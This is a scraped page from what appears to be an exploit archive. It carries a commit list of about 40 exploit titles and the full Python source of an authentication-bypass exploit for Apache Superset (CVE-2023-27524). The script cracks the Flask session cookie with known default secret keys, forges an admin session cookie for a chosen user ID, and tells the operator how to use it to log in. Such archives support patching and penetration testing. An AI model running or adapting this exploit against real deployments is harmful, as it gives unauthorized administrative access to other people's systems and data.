0a7adaa3fc
40 changes to exploits/shellcodes/ghdb Optoma 1080PSTX Firmware C02 - Authentication Bypass Screen SFT DAB 600/C - Authentication Bypass Account Creation Screen SFT DAB 600/C - Authentication Bypass Admin Password Change Screen SFT DAB 600/C - Authentication Bypass Erase Account Screen SFT DAB 600/C - Authentication Bypass Password Change Screen SFT DAB 600/C - Authentication Bypass Reset Board Config Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) PnPSCADA v2.x - Unauthenticated PostgreSQL Injection Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution Yank Note v3.52.1 (Electron) - Arbitrary Code Execution Apache Superset 2.0.0 - Authentication Bypass FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) Affiliate Me Version 5.0.1 - SQL Injection Best POS Management System v1.0 - Unauthenticated Remote Code Execution Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) e107 v2.3.2 - Reflected XSS File Thingie 2.5.7 - Remote Code Execution (RCE) GetSimple CMS v3.3.16 - Remote Code Execution (RCE) LeadPro CRM v1.0 - SQL Injection PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS) Prestashop 8.0.4 - CSV injection Quicklancer v1.0 - SQL Injection SitemagicCMS 4.4.3 - Remote Code Execution (RCE) Smart School v1.0 - SQL Injection Stackposts Social Marketing Tool v1.0 - SQL Injection thrsrossi Millhouse-Project 1.414 - Remote Code Execution TinyWebGallery v2.5 - Remote Code Execution (RCE) WBiz Desk 1.2 - SQL Injection Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking MobileTrans 4.0.11 - Weak Service Privilege Escalation Trend Micro OfficeScan Client 10.0 - ACL Service LPE eScan Management Console 14.0.1400.2281 - Cross Site Scripting eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
105 lines
No EOL
3.2 KiB
Python
Executable file
105 lines
No EOL
3.2 KiB
Python
Executable file
# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass
|
|
# Date: 10 May 2023
|
|
# Exploit Author: MaanVader
|
|
# Vendor Homepage: https://superset.apache.org/
|
|
# Version: Apache Superset<= 2.0.1
|
|
# Tested on: 2.0.0
|
|
# CVE: CVE-2023-27524
|
|
|
|
from flask_unsign import session
|
|
import requests
|
|
import urllib3
|
|
import argparse
|
|
import re
|
|
from time import sleep
|
|
from selenium import webdriver
|
|
from urllib.parse import urlparse
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
|
|
SECRET_KEYS = [
|
|
b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1
|
|
b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1
|
|
b'thisISaSECRET_1234', # deployment template
|
|
b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation
|
|
b'TEST_NON_DEV_SECRET' # docker compose
|
|
]
|
|
|
|
def main():
|
|
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)
|
|
parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')
|
|
args = parser.parse_args()
|
|
|
|
try:
|
|
u = args.url.rstrip('/') + '/login/'
|
|
|
|
headers = {
|
|
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'
|
|
}
|
|
|
|
resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
|
|
if resp.status_code != 200:
|
|
print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
|
|
return
|
|
|
|
session_cookie = None
|
|
for c in resp.cookies:
|
|
if c.name == 'session':
|
|
session_cookie = c.value
|
|
break
|
|
|
|
if not session_cookie:
|
|
print('Error: No session cookie found')
|
|
return
|
|
|
|
print(f'Got session cookie: {session_cookie}')
|
|
|
|
try:
|
|
decoded = session.decode(session_cookie)
|
|
print(f'Decoded session cookie: {decoded}')
|
|
except:
|
|
print('Error: Not a Flask session cookie')
|
|
return
|
|
|
|
match = re.search(r'"version_string": "(.*?)"', resp.text)
|
|
if match:
|
|
version = match.group(1)
|
|
else:
|
|
version = 'Unknown'
|
|
|
|
print(f'Superset Version: {version}')
|
|
|
|
|
|
for i, k in enumerate(SECRET_KEYS):
|
|
cracked = session.verify(session_cookie, k)
|
|
if cracked:
|
|
break
|
|
|
|
if not cracked:
|
|
print('Failed to crack session cookie')
|
|
return
|
|
|
|
print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')
|
|
|
|
try:
|
|
user_id = int(args.id)
|
|
except:
|
|
user_id = args.id
|
|
|
|
forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)
|
|
print(f'Forged session cookie for user {user_id}: {forged_cookie}')
|
|
u1 = args.url.rstrip('/') + '/superset/welcome'
|
|
|
|
print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")
|
|
|
|
|
|
|
|
|
|
except Exception as e:
|
|
print(f'Unexpected error: {e}')
|
|
|
|
|
|
if __name__ == '__main__':
|
|
main() |